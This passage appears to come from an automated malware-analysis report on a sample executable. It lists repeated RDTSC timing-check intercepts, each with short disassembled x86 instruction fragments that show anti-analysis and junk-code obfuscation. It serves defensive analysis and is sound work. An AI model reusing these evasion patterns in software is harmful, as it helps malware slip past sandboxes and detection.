      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E6D50 second address: 2E6D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E6D56 second address: 2E6D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E8EBE second address: 2E8EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8CACC719EDh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F8CACC719E6h 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E9F77 second address: 2E9F90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E9F90 second address: 2E9FF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F8CACC719F2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D25FAh], edx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F8CACC719E8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov edi, 4A7A3086h 0x00000039 push eax 0x0000003a push edi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F8CACC719F3h 0x00000042 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EAA67 second address: 2EAA6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EAA6E second address: 2EAAFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CACC719F2h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F8CACC719E8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c movzx esi, bx 0x0000002f mov di, 8523h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F8CACC719E8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D1DFBh] 0x00000055 jmp 00007F8CACC719F5h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e jnc 00007F8CACC719E6h 0x00000064 pop eax 0x00000065 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EB5F7 second address: 2EB5FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EEC4D second address: 2EEC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EEC51 second address: 2EEC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F8CACB12CBAh 0x0000000c pop edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EEC63 second address: 2EEC83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F8CACC719E6h 0x00000009 ja 00007F8CACC719E6h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8CACC719EEh 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EEC83 second address: 2EEC87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F147E second address: 2F1484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F1484 second address: 2F1488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F42CD second address: 2F434F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F8CACC719E6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 nop 0x00000012 mov edi, dword ptr [ebp+122D287Dh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F8CACC719E8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 mov ebx, dword ptr [ebp+1247A441h] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F8CACC719E8h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Ah 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 jmp 00007F8CACC719ECh 0x0000005b xor bx, 5958h 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 jnl 00007F8CACC719E8h 0x00000069 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F434F second address: 2F4378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8CACB12CBEh 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F52A9 second address: 2F52B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F52B1 second address: 2F5301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F8CACB12CB8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 adc edi, 4CD883A0h 0x00000029 jc 00007F8CACB12CBCh 0x0000002f mov edi, dword ptr [ebp+122D282Dh] 0x00000035 push 00000000h 0x00000037 mov edi, 1B680646h 0x0000003c push 00000000h 0x0000003e add bx, 2FE5h 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F5301 second address: 2F531B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8CACC719F2h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F242B second address: 2F2431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F2431 second address: 2F2435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F5572 second address: 2F5583 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8CACB12CB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F661E second address: 2F6623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F9284 second address: 2F928A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F928A second address: 2F928E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FA1A3 second address: 2FA1A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FB3E5 second address: 2FB3EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FD102 second address: 2FD108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FD108 second address: 2FD10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FF1DB second address: 2FF1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FF1DF second address: 2FF1F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FF1F5 second address: 2FF200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FD325 second address: 2FD350 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8CACC719ECh 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FF200 second address: 2FF206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FD350 second address: 2FD356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FF206 second address: 2FF225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8CACB12CC7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3024DC second address: 302501 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8CACC719F8h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 302501 second address: 302507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 302507 second address: 30250B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 302731 second address: 302764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CACB12CC8h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8CACB12CC0h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 303594 second address: 30359A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 30AC44 second address: 30AC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8CACB12CBFh 0x0000000f jns 00007F8CACB12CB6h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 30A69C second address: 30A6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 30A6A1 second address: 30A6B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CBAh 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a ja 00007F8CACB12CB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 30D151 second address: 30D15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007F8CACC719E6h 0x0000000c popad 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 30D15E second address: 30D173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F8CACB12CBBh 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 310682 second address: 310686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3173D5 second address: 31740B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jg 00007F8CACB12CC2h 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F8CACB12CC0h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 31740B second address: 31742C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F8CACC719EEh 0x0000000b jng 00007F8CACC719F2h 0x00000011 jne 00007F8CACC719E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316671 second address: 316675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34D7AB second address: 34D7B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DA77 second address: 34DA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jno 00007F8CACB12CB6h 0x0000000e pop edi 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DA86 second address: 34DAAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F8CACC719E6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8CACC719EDh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DAAD second address: 34DAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DAB1 second address: 34DAC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719EDh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DAC4 second address: 34DAF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CACB12CC9h 0x00000009 jmp 00007F8CACB12CC3h 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DAF4 second address: 34DAFE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8CACC719E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34DD7B second address: 34DD88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F8CACB12CB6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34E036 second address: 34E03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34E03E second address: 34E073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F8CACB12CBCh 0x0000000b pop edx 0x0000000c jmp 00007F8CACB12CC7h 0x00000011 popad 0x00000012 ja 00007F8CACB12CC4h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3518C2 second address: 3518C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3518C8 second address: 3518CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3518CC second address: 3518D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3518D0 second address: 3518E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8CACB12CBBh 0x0000000e pop ebx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 351B5F second address: 351B73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 351B73 second address: 351B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8CACB12CC3h 0x0000000f popad 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 351B91 second address: 351BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CACC719EDh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 351BA5 second address: 351BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 351D16 second address: 351D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E306 second address: 35E33C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CACB12CB6h 0x00000008 jmp 00007F8CACB12CC4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8CACB12CC5h 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E33C second address: 35E348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007F8CACC719E6h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E8DF second address: 35E8F5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8CACB12CB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 ja 00007F8CACB12CB6h 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E8F5 second address: 35E927 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CACC719E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007F8CACC719EFh 0x00000017 popad 0x00000018 pushad 0x00000019 push ecx 0x0000001a jmp 00007F8CACC719ECh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E927 second address: 35E93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F8CACB12CBEh 0x0000000b jnl 00007F8CACB12CB6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E93E second address: 35E944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35E944 second address: 35E948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35EC0F second address: 35EC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F8CACC719EEh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35ED79 second address: 35ED85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8CACB12CB6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 35ED85 second address: 35EDC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F8CACC719E8h 0x00000012 jmp 00007F8CACC719F4h 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007F8CACC719E6h 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 365796 second address: 36579C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 36579C second address: 3657A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3749DF second address: 3749E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
